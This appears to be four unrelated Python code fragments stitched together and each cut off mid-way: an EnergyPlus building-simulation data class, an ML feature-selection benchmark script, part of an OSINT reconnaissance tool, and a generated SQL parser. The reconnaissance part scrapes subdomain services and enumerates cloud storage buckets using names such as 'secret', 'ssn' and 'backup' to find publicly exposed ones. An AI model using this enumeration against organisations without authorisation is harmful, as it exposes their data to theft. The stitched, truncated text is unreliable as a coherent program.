"""field `Minimum Outdoor Temperature Schedule Name`
| This schedule contains the outdoor temperature versus time below which
| cross mixing is shutoff.
Args:
value (str): value for IDD Field `Minimum Outdoor Temperature Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `minimum_outdoor_temperature_schedule_name` or None if not set
"""
return self["Minimum Outdoor Temperature Schedule Name"]
@minimum_outdoor_temperature_schedule_name.setter
def minimum_outdoor_temperature_schedule_name(self, value=None):
"""Corresponds to IDD field `Minimum Outdoor Temperature Schedule
Name`"""
self["Minimum Outdoor Temperature Schedule Name"] = value
@property
def maximum_outdoor_temperature_schedule_name(self):
"""field `Maximum Outdoor Temperature Schedule Name`
| This schedule contains the outdoor temperature versus time above which
| cross mixing is shutoff.
Args:
value (str): value for IDD Field `Maximum Outdoor Temperature Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `maximum_outdoor_temperature_schedule_name` or None if not set
"""
return self["Maximum Outdoor Temperature Schedule Name"]
@maximum_outdoor_temperature_schedule_name.setter
def maximum_outdoor_temperature_schedule_name(self, value=None):
"""Corresponds to IDD field `Maximum Outdoor Temperature Schedule
Name`"""
self["Maximum Outdoor Temperature Schedule Name"] = value
class ZoneRefrigerationDoorMixing(DataObject):
"""Corresponds to IDD object `ZoneRefrigerationDoorMixing` Refrigeration
Door Mixing is used for an opening between two zones that are at the same
elevation but have different air temperatures.
In this case, the mixing air flow
between the two zones is determined by the density difference between the two zones.
This would typically be used between two zones in a refrigerated warehouse that are
controlled at different temperatures. It could also be used to model a door to a walk-in
refrigerated space if that space were modeled as a zone instead of using the object Refrigeration:WalkIn.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'zone 1 name',
{'name': u'Zone 1 Name',
'pyname': u'zone_1_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'zone 2 name',
{'name': u'Zone 2 Name',
'pyname': u'zone_2_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'schedule name',
{'name': u'Schedule Name',
'pyname': u'schedule_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'door height',
{'name': u'Door Height',
'pyname': u'door_height',
'default': 3.0,
'maximum': 50.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'door area',
{'name': u'Door Area',
'pyname': u'door_area',
'default': 9.0,
'maximum': 400.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm2'}),
(u'door protection type',
{'name': u'Door Protection Type',
'pyname': u'door_protection_type',
'default': u'None',
'required-field': False,
'autosizable': False,
'accepted-values': [u'None',
u'AirCurtain',
u'StripCurtain'],
'autocalculatable': False,
'type': 'alpha'})]),
'format': None,
'group': u'Zone Airflow',
'min-fields': 4,
'name': u'ZoneRefrigerationDoorMixing',
'pyname': u'ZoneRefrigerationDoorMixing',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def zone_1_name(self):
"""field `Zone 1 Name`
Args:
value (str): value for IDD Field `Zone 1 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `zone_1_name` or None if not set
"""
return self["Zone 1 Name"]
@zone_1_name.setter
def zone_1_name(self, value=None):
"""Corresponds to IDD field `Zone 1 Name`"""
self["Zone 1 Name"] = value
@property
| |
<gh_stars>1-10
#!/usr/bin/python3
from functools import partial
from datetime import datetime
import pandas as pd
from joblib import parallel_backend
import random
import numpy as np
from sklearn.calibration import CalibratedClassifierCV
import shutil
import pathlib
import os
import math
import random
from matplotlib import pyplot
import matplotlib.pyplot as plt
import time
import copy
import random
import pickle
from joblib import Parallel, delayed
import tempfile
from xgboost import XGBClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis, QuadraticDiscriminantAnalysis
from sklearn.naive_bayes import GaussianNB, BernoulliNB, CategoricalNB, ComplementNB
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.neural_network import MLPClassifier
from joblib import Parallel, delayed
import itertools
import multiprocessing
import socket
from glob import glob
from collections import OrderedDict
import logging
import mlflow
from typing import Dict, Any
import hashlib
import json
from pymrmre import mrmr
from pprint import pprint
from sklearn.utils._testing import ignore_warnings
from sklearn.exceptions import ConvergenceWarning
from sklearn.feature_selection import RFE, RFECV
from sklearn.dummy import DummyClassifier
from sklearn.metrics import confusion_matrix
from sklearn.metrics import roc_curve, auc, roc_auc_score, precision_recall_curve
from sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score, classification_report
from sklearn.linear_model import LogisticRegression, SGDClassifier
from sklearn.svm import SVC, LinearSVC
from sklearn.ensemble import AdaBoostClassifier
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import cross_val_score
from sklearn.preprocessing import StandardScaler
from sklearn.covariance import EllipticEnvelope
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import IsolationForest, RandomForestClassifier
from sklearn.model_selection import RepeatedStratifiedKFold
from sklearn.pipeline import Pipeline
from sklearn.feature_selection import SelectKBest, SelectFromModel
from sklearn.feature_selection import mutual_info_classif
from mlflow import log_metric, log_param, log_artifact, log_dict, log_image
from loadData import *
from utils import *
from parameters import *
from extraFeatureSelections import *
### parameters
TrackingPath = "/data/results/radFS/mlrun.benchmark"
print ("Have", len(fselParameters["FeatureSelection"]["Methods"]), "Feature Selection Methods.")
print ("Have", len(clfParameters["Classification"]["Methods"]), "Classifiers.")
# wie CV: alle parameter gehen einmal durch
def getExperiments (experimentList, expParameters, sKey, inject = None):
newList = []
for exp in experimentList:
for cmb in list(itertools.product(*expParameters.values())):
pcmb = dict(zip(expParameters.keys(), cmb))
if inject is not None:
pcmb.update(inject)
_exp = exp.copy()
_exp.append((sKey, pcmb))
newList.append(_exp)
experimentList = newList.copy()
return experimentList
# this is pretty non-generic, maybe there is a better way, for now it works.
def generateAllExperiments (experimentParameters, verbose = False):
experimentList = [ [] ]
for k in experimentParameters.keys():
if verbose == True:
print ("Adding", k)
if k == "BlockingStrategy":
newList = []
blk = experimentParameters[k].copy()
newList.extend(getExperiments (experimentList, blk, k))
experimentList = newList.copy()
elif k == "FeatureSelection":
# this is for each N too
print ("Adding feature selection")
newList = []
for n in experimentParameters[k]["N"]:
for m in experimentParameters[k]["Methods"]:
fmethod = experimentParameters[k]["Methods"][m].copy()
fmethod["nFeatures"] = [n]
newList.extend(getExperiments (experimentList, fmethod, m))
experimentList = newList.copy()
elif k == "Classification":
newList = []
for m in experimentParameters[k]["Methods"]:
newList.extend(getExperiments (experimentList, experimentParameters[k]["Methods"][m], m))
experimentList = newList.copy()
else:
experimentList = getExperiments (experimentList, experimentParameters[k], k)
return experimentList
# if we do not want scaling to be performed on all data,
# we need to save thet scaler. same for imputer.
def preprocessData (X, y):
simp = SimpleImputer(strategy="mean")
X = pd.DataFrame(simp.fit_transform(X),columns = X.columns)
sscal = StandardScaler()
X = pd.DataFrame(sscal.fit_transform(X),columns = X.columns)
return X, y
def applyFS (X, y, fExp):
print ("Applying", fExp)
return X, y
def applyCLF (X, y, cExp, fExp = None):
print ("Training", cExp, "on FS:", fExp)
return "model"
def testModel (y_pred, y_true, idx, fold = None):
t = np.array(y_true)
p = np.array(y_pred)
# naive bayes can produce nan-- on ramella2018 it happens.
# in that case we replace nans by 0
p = np.nan_to_num(p)
y_pred_int = [int(k>=0.5) for k in p]
acc = accuracy_score(t, y_pred_int)
df = pd.DataFrame ({"y_true": t, "y_pred": p}, index = idx)
return {"y_pred": p, "y_test": t,
"y_pred_int": y_pred_int,
"idx": np.array(idx).tolist()}, df, acc
def getRunID (pDict):
def dict_hash(dictionary: Dict[str, Any]) -> str:
dhash = hashlib.md5()
encoded = json.dumps(dictionary, sort_keys=True).encode()
dhash.update(encoded)
return dhash.hexdigest()
run_id = dict_hash(pDict)
return run_id
def getAUCCurve (modelStats, dpi = 100):
# compute roc and auc
fpr, tpr, thresholds = roc_curve (modelStats["y_test"], modelStats["y_pred"])
area_under_curve = auc (fpr, tpr)
if (math.isnan(area_under_curve) == True):
print ("ERROR: Unable to compute AUC of ROC curve. NaN detected!")
print (modelStats["y_test"])
print (modelStats["y_pred"])
raise Exception ("Unable to compute AUC")
sens, spec = findOptimalCutoff (fpr, tpr, thresholds)
return area_under_curve, sens, spec
def getPRCurve (modelStats, dpi = 100):
# compute roc and auc
precision, recall, thresholds = precision_recall_curve(modelStats["y_test"], modelStats["y_pred"])
try:
f1 = f1_score (modelStats["y_test"], modelStats["y_pred_int"])
except Exception as e:
print (modelStats["y_test"])
print (modelStats["y_pred_int"])
raise (e)
f1_auc = auc (recall, precision)
if (math.isnan(f1_auc) == True):
print ("ERROR: Unable to compute AUC of PR curve. NaN detected!")
print (modelStats["y_test"])
print (modelStats["y_pred"])
raise Exception ("Unable to compute AUC")
return f1, f1_auc
def logMetrics (foldStats):
y_preds = []
y_test = []
y_index = []
aucList = {}
for k in foldStats:
if "fold" in k:
y_preds.extend(foldStats[k]["y_pred"])
y_test.extend(foldStats[k]["y_test"])
y_index.extend(foldStats[k]["idx"])
fpr, tpr, thresholds = roc_curve (foldStats[k]["y_test"], foldStats[k]["y_pred"])
area_under_curve = auc (fpr, tpr)
aucList["AUC" + "_" + str(len(aucList))] = area_under_curve
auc_mean = np.mean(list(aucList.values()))
auc_std = np.std(list(aucList.values()))
aucList["AUC_mean"] = auc_mean
aucList["AUC_std"] = auc_std
modelStats, df, acc = testModel (y_preds, y_test, idx = y_index, fold = "ALL")
roc_auc, sens, spec = getAUCCurve (modelStats, dpi = 72)
f1, f1_auc = getPRCurve (modelStats, dpi = 72)
#pprint(aucList)
log_dict(aucList, "aucStats.json")
log_dict(modelStats, "params.yml")
log_metric ("Accuracy", acc)
log_metric ("Sens", sens)
log_metric ("Spec", spec)
log_metric ("AUC", roc_auc)
log_metric ("F1", f1)
log_metric ("F1_AUC", f1_auc)
#print (foldStats["features"])
log_dict(foldStats["features"], "features.json")
for k in foldStats["params"]:
log_param (k, foldStats["params"][k])
with tempfile.TemporaryDirectory() as temp_dir:
predFile = os.path.join(temp_dir, "preds.csv")
df.to_csv(predFile)
mlflow.log_artifact(predFile)
print(".", end = '', flush=True)
return {}
def createFSel (fExp, cache = True):
method = fExp[0][0]
nFeatures = fExp[0][1]["nFeatures"]
if method == "LASSO":
C = fExp[0][1]["C"]
clf = LogisticRegression(penalty='l1', max_iter=500, solver='liblinear', C = C)
pipe = SelectFromModel(clf, prefit=False, max_features=nFeatures)
if method == "ET":
clf = ExtraTreesClassifier()
pipe = SelectFromModel(clf, prefit=False, max_features=nFeatures)
if method == "ReliefF":
from ITMO_FS.filters.univariate import reliefF_measure
pipe = SelectKBest(reliefF_measure, k = nFeatures)
if method == "MIM":
pipe = SelectKBest(mutual_info_classif, k = nFeatures)
if method == "Chi2":
from ITMO_FS.filters.univariate import chi2_measure
pipe = SelectKBest(chi2_measure, k = nFeatures)
if method == "Anova":
from ITMO_FS.filters.univariate import anova
pipe = SelectKBest(anova, k = nFeatures)
if method == "InformationGain":
from ITMO_FS.filters.univariate import information_gain
pipe = SelectKBest(information_gain, k = nFeatures)
if method == "GiniIndex":
from ITMO_FS.filters.univariate import gini_index
pipe = SelectKBest(gini_index, k = nFeatures)
if method == "SUMeasure":
from ITMO_FS.filters.univariate import su_measure
pipe = SelectKBest(su_measure, k = nFeatures)
if method == "FCBF":
from ITMO_FS.filters.multivariate.FCBF import FCBFDiscreteFilter
def fcbf_fct (X, y):
fcbf = FCBFDiscreteFilter()
fcbf.fit(X,y)
idxList = fcbf.selected_features
scores = [1 if idx in idxList else 0 for idx in range(X.shape[1])]
return np.array(scores)
pipe = SelectKBest(fcbf_fct, k = nFeatures)
if method == "MCFS":
from ITMO_FS.filters import MCFS
def mcfs_fct (X, y):
mcfs = MCFS(nFeatures, scheme='0-1') # dot is broken
idxList = mcfs.feature_ranking(X)
scores = [1 if idx in idxList else 0 for idx in range(X.shape[1])]
return np.array(scores)
pipe = SelectKBest(mcfs_fct, k = nFeatures)
if method == "UDFS":
from ITMO_FS.filters import UDFS
def udfs_fct (X, y):
udfs = UDFS(nFeatures)
idxList = udfs.feature_ranking(X)
scores = [1 if idx in idxList else 0 for idx in range(X.shape[1])]
return np.array(scores)
pipe = SelectKBest(udfs_fct, k = nFeatures)
if method == "Pearson":
from ITMO_FS.filters.univariate import pearson_corr
pipe = SelectKBest(pearson_corr, k = nFeatures)
if method == "Kendall":
from scipy.stats import kendalltau
def kendall_corr_fct (X, y):
scores = [0]*X.shape[1]
for k in range(X.shape[1]):
scores[k] = 1-kendalltau(X[:,k], y)[1]
return np.array(scores)
pipe = SelectKBest(kendall_corr_fct, k = nFeatures)
if method == "Fechner":
from ITMO_FS.filters.univariate import fechner_corr
pipe = SelectKBest(fechner_corr, k = nFeatures)
if method == "Spearman":
from ITMO_FS.filters.univariate import spearman_corr
pipe = SelectKBest(spearman_corr, k = nFeatures)
if method == "Laplacian":
from ITMO_FS.filters.univariate import laplacian_score
def laplacian_score_fct (X, y):
scores = laplacian_score(X,y)
return -scores
pipe = SelectKBest(laplacian_score_fct, k = nFeatures)
if method == "FisherScore":
from ITMO_FS.filters.univariate import f_ratio_measure
pipe = SelectKBest(f_ratio_measure, k = nFeatures)
if method == "Relief":
from extraFeatureSelections import relief_measure
pipe = SelectKBest(relief_measure, k = nFeatures)
if method == "JMI":
from skfeature.function.information_theoretical_based import JMI
def jmi_score (X, y, nFeatures):
sol, _, _ = JMI.jmi (X,y, n_selected_features = nFeatures)
scores = [0]*X.shape[1]
for j,z in enumerate(sol):
scores[z] = (len(sol) - j)/len(sol)
scores = np.asarray(scores, dtype = np.float32)
return scores
jmi_score_fct = partial(jmi_score, nFeatures = nFeatures)
pipe = SelectKBest(jmi_score_fct, k = nFeatures)
if method == "ICAP":
from skfeature.function.information_theoretical_based import ICAP
def icap_score (X, y, nFeatures):
sol, _, _ =ICAP.icap (X,y, n_selected_features = nFeatures)
scores = [0]*X.shape[1]
for j,z in enumerate(sol):
scores[z] = (len(sol) - j)/len(sol)
scores = np.asarray(scores, dtype = np.float32)
return scores
icap_score_fct = partial(icap_score, nFeatures = nFeatures)
pipe = SelectKBest(icap_score_fct, k = nFeatures)
# not exported
if method == "DCSF":
from ITMO_FS.filters.multivariate import DCSF
def dcsf_score_fct (X, y):
selected_features | |
issuer, subject, and a hash
Censys uses for the /view/ API calls to fetch additional information.
A free API key is required.
"""
if self.censys_cert_search is None:
pass
else:
try:
print(green("[+] Performing Censys certificate search for {}".format(target)))
query = "parsed.names: %s" % target
results = self.censys_cert_search.search(query, fields=['parsed.names',
'parsed.signature_algorithm.name','parsed.signature.self_signed',
'parsed.validity.start','parsed.validity.end','parsed.fingerprint_sha256',
'parsed.subject_dn','parsed.issuer_dn'])
return results
except censys.base.CensysRateLimitExceededException:
print(red("[!] Censys reports your account has run out of API credits."))
return None
except Exception as error:
print(red("[!] Error collecting Censys certificate data for {}.".format(target)))
print(red("L.. Details: {}".format(error)))
return None
def parse_cert_subdomain(self, subject_dn):
"""Accepts the Censys certificate data and parses the individual certificate's domain."""
if "," in subject_dn:
pos = subject_dn.find('CN=')+3
else:
pos = 3
tmp = subject_dn[pos:]
if "," in tmp:
pos = tmp.find(",")
tmp = tmp[:pos]
return tmp
def filter_subdomains(self, domain, subdomains):
"""Function to filter out uninteresting domains that may be returned from certificates.
These are domains unrelated to the true target. For example, a search for blizzard.com
on Censys can return iran-blizzard.ir, an unwanted and unrelated domain.
Credit to christophetd for this nice bit of code:
https://github.com/christophetd/censys-subdomain-finder/blob/master/censys_subdomain_finder.py#L31
"""
return [ subdomain for subdomain in subdomains if '*' not in subdomain and subdomain.endswith(domain) ]
def run_urlvoid_lookup(self, domain):
"""Collect reputation data from URLVoid for the target domain. This returns an ElementTree
object.
A free API key is required.
"""
if not helpers.is_ip(domain):
try:
if self.urlvoid_api_key != "":
url = "http://api.urlvoid.com/api1000/{}/host/{}"\
.format(self.urlvoid_api_key, domain)
response = requests.get(url)
tree = ET.fromstring(response.content)
return tree
else:
print(green("[-] No URLVoid API key, so skipping this test."))
return None
except Exception as error:
print(red("[!] Could not load URLVoid for reputation check!"))
print(red("L.. Details: {}".format(error)))
return None
else:
print(red("[!] Target is not a domain, so skipping URLVoid queries."))
def check_dns_dumpster(self, domain):
"""Function to collect subdomains known to DNS Dumpster for the provided domain. This is
based on PaulSec's unofficial DNS Dumpster API available on GitHub.
"""
dnsdumpster_url = "https://dnsdumpster.com/"
results = {}
cookies = {}
requests.packages.urllib3.disable_warnings()
session = requests.session()
request = session.get(dnsdumpster_url, verify=False)
csrf_token = session.cookies['csrftoken']
cookies['csrftoken'] = session.cookies['csrftoken']
headers = {'Referer': dnsdumpster_url}
data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain}
request = session.post(dnsdumpster_url, cookies=cookies, data=data, headers=headers)
if request.status_code != 200:
print(red("[+] There appears to have been an error communicating with DNS Dumpster -- {} \
received!".format(request.status_code)))
soup = BeautifulSoup(request.content, 'lxml')
tables = soup.findAll('table')
results = {}
results['domain'] = domain
results['dns_records'] = {}
results['dns_records']['dns'] = self.retrieve_results(tables[0])
results['dns_records']['mx'] = self.retrieve_results(tables[1])
results['dns_records']['txt'] = self.retrieve_txt_record(tables[2])
results['dns_records']['host'] = self.retrieve_results(tables[3])
# Try to fetch the network mapping image
try:
val = soup.find('img', attrs={'class': 'img-responsive'})['src']
tmp_url = "{}{}".format(dnsdumpster_url, val)
image_data = base64.b64encode(requests.get(tmp_url).content)
except Exception:
image_data = None
finally:
results['image_data'] = image_data
return results
def retrieve_results(self, table):
"""Helper function for check_dns_dumpster which extracts the results from the HTML soup."""
results = []
trs = table.findAll('tr')
for tr in trs:
tds = tr.findAll('td')
pattern_ip = r'([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})'
ip = re.findall(pattern_ip, tds[1].text)[0]
domain = tds[0].text.replace('\n', '').split(' ')[0]
header = ' '.join(tds[0].text.replace('\n', '').split(' ')[1:])
reverse_dns = tds[1].find('span', attrs={}).text
additional_info = tds[2].text
country = tds[2].find('span', attrs={}).text
autonomous_system = additional_info.split(' ')[0]
provider = ' '.join(additional_info.split(' ')[1:])
provider = provider.replace(country, '')
data = {'domain': domain,
'ip': ip,
'reverse_dns': reverse_dns,
'as': autonomous_system,
'provider': provider,
'country': country,
'header': header}
results.append(data)
return results
def retrieve_txt_record(self, table):
"""Secondary helper function for check_dns_dumpster which extracts the TXT records."""
results = []
for td in table.findAll('td'):
results.append(td.text)
return results
def check_netcraft(self, domain):
"""Function to collect subdomains known to NetCraft for the provided domain. NetCraft blocks
scripted requests by requiring cookies and JavaScript for all browser, so Selenium is
required.
This is based on code from the DataSploit project, but updated to work with today's
NetCraft.
"""
results = []
netcraft_url = "http://searchdns.netcraft.com/?host=%s" % domain
target_dom_name = domain.split(".")
self.browser.get(netcraft_url)
link_regx = re.compile('<a href="http://toolbar.netcraft.com/site_report\?url=(.*)">')
links_list = link_regx.findall(self.browser.page_source)
for x in links_list:
dom_name = x.split("/")[2].split(".")
if (dom_name[len(dom_name) - 1] == target_dom_name[1]) and \
(dom_name[len(dom_name) - 2] == target_dom_name[0]):
results.append(x.split("/")[2])
num_regex = re.compile('Found (.*) site')
num_subdomains = num_regex.findall(self.browser.page_source)
if not num_subdomains:
num_regex = re.compile('First (.*) sites returned')
num_subdomains = num_regex.findall(self.browser.page_source)
if num_subdomains:
if num_subdomains[0] != str(0):
num_pages = int(num_subdomains[0]) // 20 + 1
if num_pages > 1:
last_regex = re.compile(
'<td align="left">%s.</td><td align="left">\n<a href="(.*)" rel="nofollow">' % (20))
last_item = last_regex.findall(self.browser.page_source)[0].split("/")[2]
next_page = 21
for x in range(2, num_pages):
url = "http://searchdns.netcraft.com/?host=%s&last=%s&from=%s&restriction=/site%%20contains" % (domain, last_item, next_page)
self.browser.get(url)
link_regx = re.compile(
'<a href="http://toolbar.netcraft.com/site_report\?url=(.*)">')
links_list = link_regx.findall(self.browser.page_source)
for y in links_list:
dom_name1 = y.split("/")[2].split(".")
if (dom_name1[len(dom_name1) - 1] == target_dom_name[1]) and \
(dom_name1[len(dom_name1) - 2] == target_dom_name[0]):
results.append(y.split("/")[2])
last_item = links_list[len(links_list) - 1].split("/")[2]
next_page = 20 * x + 1
else:
pass
return results
def fetch_netcraft_domain_history(self, domain):
"""Function to fetch a domain's IP address history from NetCraft."""
# TODO: See if the "Last Seen" and other data can be easily collected for here
ip_history = []
endpoint = "http://toolbar.netcraft.com/site_report?url=%s" % domain
time.sleep(1)
self.browser.get(endpoint)
soup = BeautifulSoup(self.browser.page_source, 'html.parser')
urls_parsed = soup.findAll('a', href=re.compile(r".*netblock\?q.*"))
for url in urls_parsed:
if urls_parsed.index(url) != 0:
result = [str(url).split('=')[2].split(">")[1].split("<")[0], \
str(url.parent.findNext('td')).strip("<td>").strip("</td>")]
ip_history.append(result)
return ip_history
def enumerate_buckets(self, client, domain, wordlist=None, fix_wordlist=None):
"""Function to search for AWS S3 buckets and accounts. Default search terms are the
client, domain, and domain without its TLD. A wordlist is optional.
This is based on modules from aws_pwn by dagrz on GitHub.
"""
# Take the user input as the initial list of keywords here
# Both example.com and example are valid bucket names, so domain+tld and domain are tried
search_terms = [domain, domain.split(".")[0], client.replace(" ", "").lower()]
# Potentially valid and interesting keywords that might be used a prefix or suffix
fixes = ["apps", "downloads", "software", "deployment", "qa", "dev", "test", "vpn",
"secret", "user", "confidential", "invoice", "config", "backup", "bak",
"xls", "csv", "ssn", "resources", "web", "testing", "uac", "legacy", "adhoc",
"docs", "documents", "res"]
bucket_results = []
account_results = []
# Add user-provided wordlist terms to our list of search terms
if wordlist is not None:
with open(wordlist, "r") as bucket_list:
for name in bucket_list:
name = name.strip()
if name and not name.startswith('#'):
search_terms.append(name)
# Add user-provided list of pre/suffixes to our list of fixes
if fix_wordlist is not None:
with open(fix_wordlist, "r") as new_fixes:
for fix in new_fixes:
fix = fix.strip()
if fix and not fix.startswith('#'):
fixes.append(fix)
# Modify search terms with some common prefixes and suffixes
# We use this new list to avoid endlessly looping
final_search_terms = []
for fix in fixes:
for term in search_terms:
final_search_terms.append(fix + "-" + term)
final_search_terms.append(term + "-" + fix)
final_search_terms.append(fix + term)
final_search_terms.append(term + fix)
# Now include our original list of base terms
for term in search_terms:
final_search_terms.append(term)
# Ensure we have only unique search terms in our list and start hunting
final_search_terms = list(set(final_search_terms))
print(yellow("[*] Your provided keywords and prefixes/suffixes have been combined to \
create {} possible buckets and spaces to check in AWS and three Digital Ocean regions".format(
len(final_search_terms))))
with click.progressbar(final_search_terms,
label="Enumerating AWS Keywords",
length=len(final_search_terms)) as bar:
for term in bar:
# Check for buckets and spaces
if self.boto3_client is not None:
result = self.validate_bucket('head', term)
bucket_results.append(result)
result = self.validate_do_space("ams3", term)
bucket_results.append(result)
result = self.validate_do_space("nyc3", term)
bucket_results.append(result)
result = self.validate_do_space("sgp1", term)
bucket_results.append(result)
# Check for accounts
result = self.validate_account(term)
account_results.append(result)
return bucket_results, account_results
def validate_bucket(self, validation_type, bucket_name):
"""Helper function used by validate_bucket_head()."""
validation_functions = {
'head': self.validate_bucket_head
}
if validation_functions[validation_type]:
return validation_functions[validation_type](bucket_name)
def validate_bucket_head(self, bucket_name):
"""Function to check a string to see if it exists as the name of an Amazon S3 bucket. This
version uses awscli to identify a bucket and then uses Requests to check public access. The
benefit of this is awscli will gather information from buckets that are otherwise
inaccessible via web requests.
"""
# This test requires authentication
# Warning: Check credentials before use
error_values = {
'400': True,
'403': True,
'404': False
}
result = {
'bucketName': bucket_name,
'bucketUri': 'http://' + bucket_name + '.s3.amazonaws.com',
'arn': 'arn:aws:s3:::' + bucket_name,
'exists': False,
'public': False
}
try:
self.boto3_client.head_bucket(Bucket=bucket_name)
result['exists'] = True
try:
# Request the bucket to check the response
request = requests.get(result['bucketUri'])
# | |
self.state = 104
self.alterDatabase()
pass
elif la_ == 3:
self.state = 105
self.dropDatabase()
pass
elif la_ == 4:
self.state = 106
self.showDatabase()
pass
elif la_ == 5:
self.state = 107
self.useDatabase()
pass
elif la_ == 6:
self.state = 108
self.opTable()
pass
self.state = 122
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,5,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
self.state = 111
self.match(SQLGramaticaParser.T__1)
self.state = 118
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,4,self._ctx)
if la_ == 1:
self.state = 112
self.createDatabase()
pass
elif la_ == 2:
self.state = 113
self.alterDatabase()
pass
elif la_ == 3:
self.state = 114
self.dropDatabase()
pass
elif la_ == 4:
self.state = 115
self.showDatabase()
pass
elif la_ == 5:
self.state = 116
self.useDatabase()
pass
elif la_ == 6:
self.state = 117
self.opTable()
pass
self.state = 124
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,5,self._ctx)
self.state = 126
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==SQLGramaticaParser.T__1:
self.state = 125
self.match(SQLGramaticaParser.T__1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class CreateDatabaseContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.CreateDatabaseContext, self).__init__(parent, invokingState)
self.parser = parser
def CREATE(self):
return self.getToken(SQLGramaticaParser.CREATE, 0)
def DATABASE(self):
return self.getToken(SQLGramaticaParser.DATABASE, 0)
def IDX(self):
return self.getToken(SQLGramaticaParser.IDX, 0)
def getRuleIndex(self):
return SQLGramaticaParser.RULE_createDatabase
def enterRule(self, listener):
if hasattr(listener, "enterCreateDatabase"):
listener.enterCreateDatabase(self)
def exitRule(self, listener):
if hasattr(listener, "exitCreateDatabase"):
listener.exitCreateDatabase(self)
def accept(self, visitor):
if hasattr(visitor, "visitCreateDatabase"):
return visitor.visitCreateDatabase(self)
else:
return visitor.visitChildren(self)
def createDatabase(self):
localctx = SQLGramaticaParser.CreateDatabaseContext(self, self._ctx, self.state)
self.enterRule(localctx, 8, self.RULE_createDatabase)
try:
self.enterOuterAlt(localctx, 1)
self.state = 128
self.match(SQLGramaticaParser.CREATE)
self.state = 129
self.match(SQLGramaticaParser.DATABASE)
self.state = 130
self.match(SQLGramaticaParser.IDX)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class AlterDatabaseContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.AlterDatabaseContext, self).__init__(parent, invokingState)
self.parser = parser
def ALTER(self):
return self.getToken(SQLGramaticaParser.ALTER, 0)
def DATABASE(self):
return self.getToken(SQLGramaticaParser.DATABASE, 0)
def IDX(self, i=None):
if i is None:
return self.getTokens(SQLGramaticaParser.IDX)
else:
return self.getToken(SQLGramaticaParser.IDX, i)
def RENAME(self):
return self.getToken(SQLGramaticaParser.RENAME, 0)
def TO(self):
return self.getToken(SQLGramaticaParser.TO, 0)
def getRuleIndex(self):
return SQLGramaticaParser.RULE_alterDatabase
def enterRule(self, listener):
if hasattr(listener, "enterAlterDatabase"):
listener.enterAlterDatabase(self)
def exitRule(self, listener):
if hasattr(listener, "exitAlterDatabase"):
listener.exitAlterDatabase(self)
def accept(self, visitor):
if hasattr(visitor, "visitAlterDatabase"):
return visitor.visitAlterDatabase(self)
else:
return visitor.visitChildren(self)
def alterDatabase(self):
localctx = SQLGramaticaParser.AlterDatabaseContext(self, self._ctx, self.state)
self.enterRule(localctx, 10, self.RULE_alterDatabase)
try:
self.enterOuterAlt(localctx, 1)
self.state = 132
self.match(SQLGramaticaParser.ALTER)
self.state = 133
self.match(SQLGramaticaParser.DATABASE)
self.state = 134
self.match(SQLGramaticaParser.IDX)
self.state = 135
self.match(SQLGramaticaParser.RENAME)
self.state = 136
self.match(SQLGramaticaParser.TO)
self.state = 137
self.match(SQLGramaticaParser.IDX)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class DropDatabaseContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.DropDatabaseContext, self).__init__(parent, invokingState)
self.parser = parser
def DROP(self):
return self.getToken(SQLGramaticaParser.DROP, 0)
def DATABASE(self):
return self.getToken(SQLGramaticaParser.DATABASE, 0)
def IDX(self):
return self.getToken(SQLGramaticaParser.IDX, 0)
def getRuleIndex(self):
return SQLGramaticaParser.RULE_dropDatabase
def enterRule(self, listener):
if hasattr(listener, "enterDropDatabase"):
listener.enterDropDatabase(self)
def exitRule(self, listener):
if hasattr(listener, "exitDropDatabase"):
listener.exitDropDatabase(self)
def accept(self, visitor):
if hasattr(visitor, "visitDropDatabase"):
return visitor.visitDropDatabase(self)
else:
return visitor.visitChildren(self)
def dropDatabase(self):
localctx = SQLGramaticaParser.DropDatabaseContext(self, self._ctx, self.state)
self.enterRule(localctx, 12, self.RULE_dropDatabase)
try:
self.enterOuterAlt(localctx, 1)
self.state = 139
